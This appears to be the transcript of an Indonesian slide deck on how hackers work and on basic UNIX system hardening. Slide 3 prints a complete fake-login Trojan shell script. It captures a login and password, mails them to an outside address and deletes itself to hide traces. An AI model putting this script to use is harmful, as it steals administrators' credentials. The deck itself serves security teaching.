1 / 12

MEMAHAMI HACKER BEKERJA

MEMAHAMI HACKER BEKERJA. Secara umum melalui tahapan-tahapan sebagai berikut : 1. Tahap mencari tahu system komputer sasaran. 2. Tahap penyusupan 3. Tahap penjelajahan 4. Tahap keluar dan menghilangkan jejak. Contoh kasus Trojan House, memanfaatkan SHELL script UNIX :

travis-ryan
Télécharger la présentation

MEMAHAMI HACKER BEKERJA

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. MEMAHAMI HACKER BEKERJA Secara umum melalui tahapan-tahapan sebagaiberikut : 1. Tahap mencari tahu system komputer sasaran. 2. Tahap penyusupan 3. Tahap penjelajahan 4. Tahap keluar dan menghilangkan jejak.

  2. Contohkasus Trojan House, memanfaatkan SHELL script UNIX : Seoranggadiscantikdangenitpesertakuliah UNIX disebuahperguruantinggimemilikipotensimemancingpengelolasistemkomputer (administrator pemegang account root . . . hmmm) yang lengah. Iamelaporkanbahwakomputertempatiamelakukantugas-tugas UNIX yang diberikantidakdapatdipergunakan. Sang pengelolasistemkomputertentusajadengangagahperkasainginmenunjukkankekuasaansebagai administrator UNIX. "Well, inisoalkecil. Mungkin password kamukeblokir, biarsayaperbaikidaritempatkamu", ujar administrator UNIX sombongsambildudukdisebelahgadiscantikdangenitpesertakuliahtersebut. Keesokanharinya, terjadilahkekacauandisistem UNIX karenadidugaterjadipenyusupanoleh hacker termasukjugahompepageperguruantinggitersebutdi-obok-obok, maklumpengelolanyamasihsama. Selanjutnyapihakperguruantinggimengeluarkan press release bahwa homepage merekadijebololeh hacker dariLuarNegeri . . . . hihiii

  3. Nah sebenarnyaapasih yang terjadi ? Sederhana, gadiscantikdangenitpesertakuliah UNIX tersebutmenggunakan program kecilmy_logindalambentuk shell script yang menyerupailayar login dan password sistem UNIX sebagaiberikut: #!/bin/sh ################################### # Nama program : my_login # Deskripsi :Program kudatrojansederhana # versi 1.0 Nopember 1999 #################################### COUNTER=0 Cat /etc/issue While [ "$COUNTER" –ne 2 ] do let COUNTER=$COIUNTER+1 echo "login: \c" read LOGIN stty echo echo "password: \c" read PASSWORD echo "User $LOGIN : $PASSWORD" | mail gadis@company.com stty echo echo echo "Login Incorrect" done rm $0 kill –9 $PPID

  4. Apabila program inidijalankanmakaakanditampilkanlayar login sepertilayaknyaawalpenggunaankomputerpdaasistem UNIX: Login: Password: Lihatlah, Administrator UNIX yang gagahperkasatadi yang tidakmelihatgadistersebutmenjalankan program initentunyatidaksadarbahwainimerupakanlayartipuan. Layar login initidakterlihatbedadibandinglayar login sesungguhnya. Sepertipada program login sesungguhnya, sistemkomputerakanmemintapemakaiuntuk login kedalamsistem. Setelahdiisi password dandienter,makasegeratimbulpesan Login:root Password: ******** Login Incorrect

  5. Tentusaja Administrator UNIX akankagetbahwapasswordnyaternyata (seolah-olah) salah. Untukituiasegeramengulangi login dan password. Setelahdua kali iamencoba login dantidakberhasil, makaloginnyadibatalkandankembalikeluar UNIX. Perhatikan program diatasbaik-baik, sekalipemakaitersebutmencoba login danmengisi password padalayardiatas, setelahitumakaotomatis data login dan password tersebutakandi email kemailto:hacker@company.com. Sampaidisinimakasigadislugudangenittelahmendapatkan login dan password . . . iaternyataseorang hacker !! Walaupunsederhana, jikakitaperhatikanlebihjauhlagi, maka program inijugamemilikibeberapatrik hacker lainnya, yaituprosespenghilanganjejak (masihingattahapan hacker yang ditulisdiatas ?). Prosesinidilakukanpada 2 baristerakhirdari program my_logindiatas, yaitu rm $0 kill –9 $PPID

  6. yang artinyaakansegeradilakukanprosespenghapusan program my_logindanhapus pula ID dariproses. Dengandemikianhilanglah program tersebut yang tentunyajugamenhilangkanbarangbukti. Ditambahlagipenghapusanterhadapjejakprosesdidalamsistem UNIX. Zap . . . hilangsudahtanda-tandabahwa hacker nyaternyataseoranggadispesertakuliahnya. Suksesdari program inisebenarnyasangattergantungdaribagaimana agar aplikasiinidapatdieksekusioleh root. Hacker yang baikmemangharusberusahamemancing agar pemilik root menjalankan program ini.

  7. PRINSIP DASAR PERANCANGAN SISTEM YANG AMAN Mencegah hilangnya data Mencegah masuknya penyusup LAPISAN KEAMANAN : 1. Lapisan Fisik : membatasi akses fisik ke mesin : 1. Akses masuk ke ruangan komputer 2. penguncian komputer secara hardware 3. keamanan BIOS 4. keamanan Bootloader back-up data : 1. pemilihan piranti back-up 2. penjadwalan back-up mendeteksi gangguan fisik : log file : Log pendek atau tidak lengkap, Log yang berisikan waktu yang aneh, Log dengan permision atau kepemilikan yang tidak tepat, Catatan pelayanan reboot atau restart, Log yang hilang, masukan suatu login dari tempat yang janggal mengontrol akses sumber daya

  8. 2. Keamanan lokal • Berkaitan dengan user dan hak-haknya : • Beri mereka fasilitas minimal yang diperlukan. • Hati-hati terhadap saat/dari mana mereka login, atau tempat seharusnya mereka login. • Pastikan dan hapus rekening mereka ketika mereka tidak lagi membutuhkan akses.

  9. 3. Keamanan Root • Ketikamelakukanperintah yang kompleks, cobalahdalamcara yang tidakmerusakdulu, terutamaperintah yang menggunakanglobbing: contoh, andainginmelakukan "rm foo*.bak", pertamacobadulu: "ls foo*.bak" danpastikanandainginmenghapus file-file yang andapikirkan. • Beberapaorangmerasaterbantuketikamelakukan "touch /-i" padasistemmereka. Hal iniakanmembuatperintah-perintahseperti : "rm -fr *" menanyakanapakahandabenar-benaringinmenghapusseluruh file. (Shell andamenguraikan "-i" dulu, danmemberlakukannyasebagai option -ikerm). • Hanyamenjadi root ketikamelakukantugastunggaltertentu. Jikaandaberusahamengetahuibagaimanamelakukansesuatu, kembalike shell pemakai normal hinggaandayakinapa yang perludilakukanoleh root. • Jalurperintahuntukpemakai root sangatpenting. Jalurperintah, atauvariabellingkungan PATH mendefinisikanlokal yang dicari shell untuk program. Cobalahdanbatasijalurperintahbagipemakai root sedapatmungkin, danjanganpernahmenggunakan '.', yang berarti 'direktorisaatini', dalampernyataan PATH anda. Sebagaitambahan, janganpernahmenaruhdirektori yang dapatditulispadajalurpencariananda, karenahalinimemungkinkanpenyerangmemodifikasiataumenaruh file binerdalamjalurpencariananda, yang memungkinkanmerekamenjadi root ketikaandamenjalankanperintahtersebut. • Janganpernahmenggunakanseperangkatutilitas rlogin/rsh/rexec (disebututilitas r) sebagai root. Merekamenjadisasaranbanyakserangan, dansangatberbahayabiladijalankansebagai root. Janganmembuat file .rhostsuntuk root. • File /etc/securettyberisikandaftar terminal-terminal tempat root dapat login. Secarabaku (padaRedHat Linux) disethanyapadakonsol virtual lokal (vty). Berhati-hatilahsaatmenambahkan yang lain ke file ini. Andaseharusnya login darijarakjauhsebagaipemakaibiasadankemudian 'su' jikaandabutuh (mudah-mudahanmelaluisshatausaluranterenkripsi lain), sehinggatidakperluuntuk login secaralangsungsebagai root. • Selaluperlahandanberhati-hatiketikamenjadi root. Tindakanandadapatmempengaruhibanyakhal. Pikirsebelumandamengetik!

  10. 4. Keamanan File dan system file • Directory home user tidak boleh mengakses perintah mengubah system seperti partisi, perubahan device dan lain-lain. • Lakukan setting limit system file. • Atur akses dan permission file : read, writa, execute bagi user maupun group. • Selalu cek program-program yang tidak dikenal

  11. 5. Keamanan Password dan Enkripsi • Hati-hati terhadap bruto force attack dengan membuat password yang baik. • Selalu mengenkripsi file yang dipertukarkan. • Lakukan pengamanan pada level tampilan, seperti screen saver. 6. Keamanan Kernel • selalu update kernel system operasi. • Ikuti review bugs dan kekurang-kekurangan pada system operasi.

  12. 7. Keamanan Jaringan • Waspadai paket sniffer yang sering menyadap port Ethernet. • Lakukan prosedur untuk mengecek integritas data • Verifikasi informasi DNS • Lindungi network file system • Gunakan firewall untuk barrier antara jaringan privat dengan jaringan eksternal

More Related